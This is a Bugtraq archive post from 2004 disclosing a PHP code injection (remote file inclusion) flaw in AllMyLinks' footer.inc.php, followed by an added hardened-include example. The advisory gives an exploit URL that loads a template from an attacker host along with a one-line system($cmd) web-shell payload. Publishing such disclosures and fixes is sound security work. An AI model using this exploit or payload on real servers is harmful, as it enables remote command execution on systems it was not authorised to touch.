Bugtraq mailing list archives
AllMyLinks PHP Code Injection vulnerability
From: Pablo Santana <m4dsk4t3r () hotmail com>
Date: 14 Feb 2004 22:19:34 -0000
******** AllMyLinks PHP Code Injection vulnerability ********

Product : AllMyLinks
Vendor : www.php-resource.net
Date : February 14, 2004
Problem : PHP Code Injection
Vendor Contacted ? : No

************************** Source ****************************

in /include/footer.inc.php

--------------------------------------------------------------
$AML_footer_get = require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php");
--------------------------------------------------------------

************************** Exploit ***************************

http://[target]/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://[attacker]/&cmd=uname%20-a

in http://[attacker]/include/template.inc.php have :

------------------------
<? system($cmd); ?>
------------------------

************************** Impact ****************************

A malicious user can execute arbitrary commands on the server.

************************* Solution ***************************

in /include/footer.inc.php replace

$AML_footer_get = require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php");

with

if (isset($_AMLconfig['cfg_serverpath'])){
die("Don\'t Hack it :)");
}
$AML_footer_get = require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php");

************************** Credits ****************************

bnfx : bnfx () antisocial com
Mad_Skater : m4dsk4t3r () hotmail com
TechTeam Brazilian Crew .
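A hardened counterpart to the include shown in the advisory, as an added example that is not part of the original post or of AllMyLinks' own code: it refuses direct requests to the include file and validates the server path before it reaches require_once. The AML_ENTRY constant, the aml_template_path() helper and the sample paths are assumptions made for the illustration.

```php
<?php
// Added example, not AllMyLinks code. AML_ENTRY and aml_template_path() are hypothetical names.

// Stands in for the application's entry script (e.g. index.php), which would
// define this constant before including anything. Defined here so the demo runs.
define('AML_ENTRY', true);

// Guard for the top of include/footer.inc.php: a direct HTTP request to the
// include file never passes through the entry script, so the constant is absent.
if (!defined('AML_ENTRY')) {
    exit('Direct access not permitted');
}

/**
 * Return the real path of include/template.inc.php under $serverPath,
 * or null unless $serverPath is a local directory inside $installRoot.
 */
function aml_template_path($serverPath, string $installRoot): ?string
{
    // Must be a string (a request can send arrays) and must not carry a scheme
    // such as http://, ftp:// or php://. Two or more scheme characters are
    // required so a Windows drive letter like C: is not mistaken for one.
    if (!is_string($serverPath) || preg_match('#^[a-z][a-z0-9+.\-]+:#i', $serverPath)) {
        return null;
    }
    $root = realpath($installRoot);
    $file = realpath($serverPath . '/include/template.inc.php');
    if ($root === false || $file === false) {
        return null;
    }
    // Containment: the resolved file must live below the install root.
    $prefix = $root . DIRECTORY_SEPARATOR;
    return strncmp($file, $prefix, strlen($prefix)) === 0 ? $file : null;
}

// --- Demo on a constructed install tree (all values below are constructed) ---
$install = sys_get_temp_dir() . '/aml_demo_' . getmypid();
@mkdir($install . '/include', 0700, true);
file_put_contents($install . '/include/template.inc.php', "<?php // constructed template\n");

$cases = [
    'configured path'      => $install,
    'request-supplied URL' => 'http://attacker.invalid/',
    'array from request'   => ['cfg_serverpath' => 'x'],
];
foreach ($cases as $label => $value) {
    $path = aml_template_path($value, $install);
    echo str_pad($label, 22), ' => ', $path === null ? 'refused' : 'include ' . $path, "\n";
}
```

In a real deployment the install root would come from dirname(__FILE__) in a trusted script rather than from any variable that register_globals can populate from the request.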
Current thread:
- AllMyLinks PHP Code Injection vulnerability Pablo Santana (Feb 16)